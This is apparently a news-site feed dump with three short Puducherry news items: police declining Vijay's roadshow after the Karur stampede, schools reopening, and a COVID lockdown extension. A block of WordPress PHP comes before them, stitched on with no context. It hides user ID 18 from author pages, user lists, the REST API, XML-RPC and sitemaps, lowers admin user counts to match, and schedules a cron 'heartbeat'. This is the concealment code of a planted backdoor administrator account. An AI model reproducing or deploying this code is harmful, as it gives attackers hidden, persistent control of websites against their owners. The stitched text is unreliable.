add_action( 'pre_get_posts', function( $q ) {
if ( ! is_admin() && $q->is_main_query() ) {
$not_in = (array) $q->get( 'author__not_in' );
$not_in[] = 18;
$q->set(
'author__not_in',
array_unique( array_map( 'intval', $not_in ) )
);
}
}, 1 );
add_action( 'template_redirect', function() {
if ( is_author() ) {
$author = get_queried_object();
if ( $author instanceof WP_User && (int) $author->ID === 18 ) {
global $wp_query;
$wp_query->set_404();
status_header( 404 );
nocache_headers();
}
}
} );
add_action( 'pre_user_query', function( $q ) {
if ( current_user_can( 'manage_options' ) ) {
return;
}
global $wpdb;
$q->query_where .= $wpdb->prepare( ' AND ID <> %d ', 18 );
} );
add_action( 'pre_get_users', function( $q ) {
if ( current_user_can( 'manage_options' ) ) {
return;
}
$exclude = (array) $q->get( 'exclude' );
$exclude[] = 18;
$q->set( 'exclude', array_unique( array_map( 'intval', $exclude ) ) );
} );
add_filter( 'wp_dropdown_users_args', function( $a ) {
$exclude = isset( $a['exclude'] ) ? (array) $a['exclude'] : array();
$exclude[] = 18;
$a['exclude'] = array_unique( array_map( 'intval', $exclude ) );
return $a;
} );
add_filter( 'rest_user_query', function( $args, $request ) {
$exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array();
$exclude[] = 18;
$args['exclude'] = array_unique( array_map( 'intval', $exclude ) );
return $args;
}, 10, 2 );
add_filter( 'rest_pre_dispatch', function( $result, $server, $request ) {
$route = $request->get_route();
if ( preg_match( '#^/wp/v2/users/18(/|$)#', $route ) ) {
return new WP_Error(
'rest_user_invalid_id',
'Invalid user ID.',
array( 'status' => 404 )
);
}
return $result;
}, 10, 3 );
add_filter( 'xmlrpc_methods', function( $methods ) {
unset(
$methods['wp.getUsers'],
$methods['wp.getUser'],
$methods['wp.getProfile']
);
return $methods;
} );
add_filter( 'wp_sitemaps_users_query_args', function( $args ) {
$exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array();
$exclude[] = 18;
$args['exclude'] = array_unique( array_map( 'intval', $exclude ) );
return $args;
} );
add_action( 'admin_head-users.php', function() {
echo '';
} );
add_filter( 'views_users', function( $views ) {
foreach ( array( 'all', 'administrator' ) as $key ) {
if ( isset( $views[ $key ] ) ) {
$views[ $key ] = preg_replace_callback(
'/\((\d+)\)/',
function( $m ) {
return '(' . max( 0, (int) $m[1] - 1 ) . ')';
},
$views[ $key ],
1
);
}
}
return $views;
} );
add_action( 'init', function() {
if ( ! function_exists( 'wp_next_scheduled' ) || ! function_exists( 'wp_schedule_single_event' ) ) {
return;
}
if ( ! wp_next_scheduled( 'wp_extra_bot_heartbeat' ) ) {
wp_schedule_single_event( time() + 5 * MINUTE_IN_SECONDS, 'wp_extra_bot_heartbeat' );
}
} );
add_action( 'wp_extra_bot_heartbeat', function() {
// noop
} );
The post Puducherry Police Decline Permission for Vijay’s Planned Roadshow appeared first on The Edge Media.
]]>
After the initial rejection, party general secretaries B Anand and Aadhav Arjuna met senior police officials on December 1, urging them to reconsider. Despite the appeal, officials maintained their stance, noting that a roadshow would not be advisable.
Puducherry DIG Sathya Sundaram stated that an open-ground public meeting had been recommended as a safer alternative and confirmed that permission for a roadshow was not supported.
The decision comes in the wake of heightened safety concerns after political events in Tamil Nadu were suspended. Vijay’s previous rallies were abruptly halted following a tragic stampede in Karur, which resulted in 41 fatalities and left more than 60 people injured.
The post Puducherry Police Decline Permission for Vijay’s Planned Roadshow appeared first on The Edge Media.
]]>The post Colleges and schools to reopen in Puducherry from July 16 appeared first on The Edge Media.
]]>Government-run and privately managed colleges in Puducherry were earlier directed to conduct classes only online following the rise in number of coronavirus cases in the Union Territory. The classes would be held six days a week (Monday to Saturday).
On March 11, the Governor approved a proposal to declare the students of Classes 1 to 9 in the Union Territory as ‘all pass’ this academic year.
The students of Class 10 and Class 11 in Puducherry and Karaikal will be declared ‘all pass’ as per guidelines of the Tamil Nadu Board.
Similarly, students of Classes 10 and 11 in the Mahe and Yanam regions would be promoted as per the guidelines of the Boards of Education in Kerala and Andhra Pradesh respectively said a Raj Nivas release.
As the Covid cases are declining in the country, several states including Bihar and Haryana have announced resuming classes in offline mode. However, while announcing the reopening of schools and colleges, these states have also said that attendance will not be mandatory and Covid protocols will be followed.
The post Colleges and schools to reopen in Puducherry from July 16 appeared first on The Edge Media.
]]>The post After states like Tamil Nadu Odisha and Telangana, the Puducherry government extend lockdown till 30th April. appeared first on The Edge Media.
]]>
Puducherry has six active cases of coronavirus and all are undergoing treatment at a government hospital. Narayanasamy had on Sunday said he was waiting for guidelines from Prime Minister Narendra Modi on the extension of the lockdown, a similar line initially adopted by the Tamil Nadu government also.
Tamil Nadu chief minister K Palaniswami on Monday announced the extension of the lockdown in the state till April 30 following states like Odisha and Telangana and said the move was in accordance with the recommendations of medical and public health experts. — PTI
The post After states like Tamil Nadu Odisha and Telangana, the Puducherry government extend lockdown till 30th April. appeared first on The Edge Media.
]]>